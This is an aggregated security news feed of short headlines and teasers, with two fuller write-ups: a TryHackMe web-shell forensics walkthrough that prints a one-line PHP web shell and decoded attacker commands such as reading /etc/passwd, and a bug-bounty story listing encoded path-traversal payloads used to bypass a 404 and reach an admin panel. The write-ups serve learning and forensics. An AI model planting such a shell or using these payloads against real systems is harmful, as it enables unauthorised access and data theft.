Africa becomes a proving ground for AI-driven phishing, deepfakes and impersonation, with attackers testing techniques against governments and enterprises.

Wireshark 4.6 open-source network protocol analyzer is now available to download with manjor new features and improvements.

CVE-2025-59397 - Open Web Analytics SQL Injection Full Disclosure mailing list archives From: Seralys Research Team via Fulldisclosure Date: Wed, 8 Oct 2025 12:19:56 +0000 Seralys Security Advisory | https://www.seral ... Read more Published Date: Oct 09, 2025 (1 hour, 55 minutes ago) Vulnerabilities has been mentioned in this article. CVE-2025-59397

A new variant of the FileFix social engineering attack uses cache smuggling to secretly download a malicious ZIP archive onto a victim's system and bypassing security software.

Register for the webinar to learn about how users interacting with malicious scripts in their web browser is a fast-growing source of security breaches.

A critical security vulnerability has been discovered in Redis Server that allows authenticated attackers to achieve remote code execution

Hackers are demanding a ransom from Salesforce, threatening to expose data from hundreds of companies.

A well-known Grafana flaw, tracked as CVE-2021-43798, allows attackers to traverse paths on a server and read any file they choose.

Un nuevo malware bautizado como SORVEPOTEL está causando estragos en Brasil al expandirse de forma masiva a través de WhatsApp Web. Su objetivo no es robar datos ni pedir rescates, sino propagarse …

By Shah kaif | “A single redirect_uri = complete JWT theft.” | LinkedIn

Not Attacking Web Apps Admin Panels The Right Way? Continue reading on InfoSec Write-ups »

Introduction In the TryHackMe Infinity Shell room, I tackled a web application forensics challenge focused on detecting a malicious PHP web shell on a CMS site. This walkthrough covers discovering the shell, decoding Base64 commands, and extracting the CTF flag , while demonstrating how attackers hide files in directories like img/ or uploads/ for remote code execution. Perfect for beginners learning web security or CTF enthusiasts sharpening forensic skills. Identifying the Web Application & Finding the Malicious Web Shell I started this challenge by looking for a web application on the box — the usual first step in web application forensics and TryHackMe CTFs. From the web root I found a CMS project that looked promising: cd /var/www/html/ ls Seeing CMSsite-master told me this was a CMS-based site (common attack surface), so I dove into that directory. cd CMSsite-master ls -la Hunting for suspicious files Attackers commonly hide web shells in places that look innocuous — img/, uploads/, includes/, etc. I listed the img/ directory and found a tiny images.php file next to normal image files: cd img/ ls -la When I examined images.php it was immediately suspicious: cat images.php <?php system(base64_decode($_GET['query'])); ?> This single line is a classic web shell pattern: it accepts base64-encoded commands via a query parameter and executes them on the server. That’s the attacker’s entry point — a direct remote command execution vector. At this point I knew I had to trace how the shell was used and what commands the attacker ran. Extracting web shell usage from Apache logs I filtered the Apache access logs for requests to images.php to get a clear timeline of what the attacker ran through the web shell. Instead of reading every line by hand, I searched for requests containing images.php? and pulled the Base64 payloads that were passed in the query parameter. That gave me a concise list of encoded commands to decode and analyse. cd /var/log/apache2/ cat other_vhosts_access.log.1 | grep -r 'images.php?' The Apache logs contained several GET requests targeting images.php, each passing Base64-encoded commands in the query parameter. GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3...ScK HTTP/1.1 Decoding the commands I decoded each Base64 string to reveal the actual shell commands the attacker executed. Here are the results: d2hvYW1pCg== bHMK ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo= aWZjb25maWcK Y2F0IC9ldGMvcGFzc3dkCg== aWQK What is the flag? THM{sup3r_34sy_w3bsh3ll} Conclusion The Infinity Shell room on TryHackMe provided a hands-on experience in web application forensics and web shell analysis . By carefully inspecting the CMS directories, identifying the malicious images.php web shell, and decoding Base64 commands from Apache logs, I was able to reconstruct the attacker’s actions and retrieve the CTF flag: THM{sup3r_34sy_w3bsh3ll} . This challenge highlights the importance of monitoring web directories for suspicious files, analyzing server logs for unusual activity, and understanding how attackers leverage hidden web shells for remote code execution . Whether you are new to CTFs or looking to sharpen your web forensics and penetration testing skills , this room reinforces critical skills for identifying and mitigating web-based attacks. TryHackMe Infinity Shell Walkthrough: Web Shell Forensics & CTF Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

U.S. CISA adds Smartbedded Meteobridge, Samsung, Juniper ScreenOS, Jenkins, and GNU Bash flaws to its Known Exploited Vulnerabilities catalog.

Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread

Investigadores de Qualys TRU han divulgado un combo de escalada local de privilegios que afecta a la mayoría de distribuciones Linux de escritorio y servidor. El ataque combina un error en la confi…

Monitor the graph of inbound and outbound network traffic and bandwidth usage in real time with the Nload command-line utility in Linux.

When 404 Said No… But I Said Yes — The Curious Case of 404 Bypass! It started as a boring test on a private bug bounty target — an internal SaaS tool that responded to every /admin, /config, /backup with a beautiful... 404 Not Found. As you all know, what is 404 bypass? I don’t want to waste your precious time, because if I waste your time here, you might not be able to hack the entire world ……….. just a joke. Don’t get angry…… Continue reading😏 But something felt wrong . A small hint: the server took suspiciously longer to respond to some 404 requests. Hmm… why would a non-existent page take time to die? The First Crack — 404 But… Delayed? Using Burp Intruder, I sent: /admin → 404 (Time: 120ms) /admin/ → 404 (Time: 130ms) /admin/. → 404 (Time: 130ms) /admin? → 404 (Time: 300ms) Wait — why was the query-param request slower? Time-based differences can mean: ✔️ Backend processing ✔️ File system check ✔️ Reverse proxy misrouting Could be Apache/Nginx wildcards mishandling or even a misconfigured Express.js server . Breaking Through — The Real Bypass Starts So I tested deeper: /admin/%2e%2e/ /admin/..;/ (Nginx/Apache weak separator bypass) /admin/.random (Some devs leave backup files like `.backup`) /admin;/. (Tomcat or WildFly dirty trick) All the responses are 404. But then… /admin;/test → 403 Forbidden? 🤔 (Interesting, not 404!) We’re cracking it — if this was 403 , maybe something lives here after all. The Shot That Landed — UTF-8 Bypass to Glory I remembered some rare Nginx behavior. Tried: /admin/%2e/ /admin/%2f/ (encoded forward slash) BAM! 500 Internal Server Error. Wait — we touched something the server didn’t expect. So I tried: /admin/%2e%2e%2f (URL-encoded ../ traversal) → 200 OK 🔥🔥🔥 No kidding — the hidden admin panel, fully alive. 404 was fake. It was hiding the real thing behind unsafe decoding! Why Is This Dangerous? ✔Bypassed Access Control using encoded path traversal. ✔Accessed hidden admin endpoints meant only for backend/internal use . ✔ Possible to reach backup configs, internal dashboards, forgotten dev files . On that panel: Old user DB backups were downloadable. Debug logs were exposed. Even an open file upload feature existed — that could have led to RCE (Remote Code Execution) . Why Did This Happen? (Root Cause) ❌ Poor URL normalization in server routing (probably Nginx/PHP/Apache misconfigured). ❌ Some frameworks double-decode or misinterpret encoded characters (UTF-8, %2f, etc.). ❌ Reverse proxy (NGINX) forwards the broken path to backend apps —  blindly trusting the URL. When 404 Said No… But I Said Yes — The Curious Case of 404 Bypass! was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Ever wondered how hackers see your website? Spoiler alert: It’s probably not as secure as you think!

Who am I? I’m Chetan Chinchulkar (aka omnipresent), a cybersecurity enthusiast, software developer, and security researcher ranked in the…

A critical vulnerability in Google Chrome, tracked as CVE-2025-2783, has been exploited in cyberattacks deploying the Trinper backdoor. The flaw, a sandbox escape vulnerability, enables attackers t…

Qualys uncovered two critical Linux flaws (CVE-2025-6018, CVE-2025-6019) allowing local root privilege escalation via PAM and UDisks. Patching is urgent for major distros.

Blog sobre informática, tecnología y seguridad con manuales, tutoriales y documentación sobre herramientas y programas

Apple ha parcheado una vulnerabilidad del iPhone que permitió hackear a dos periodistas europeos con software espía tipo Pegasus.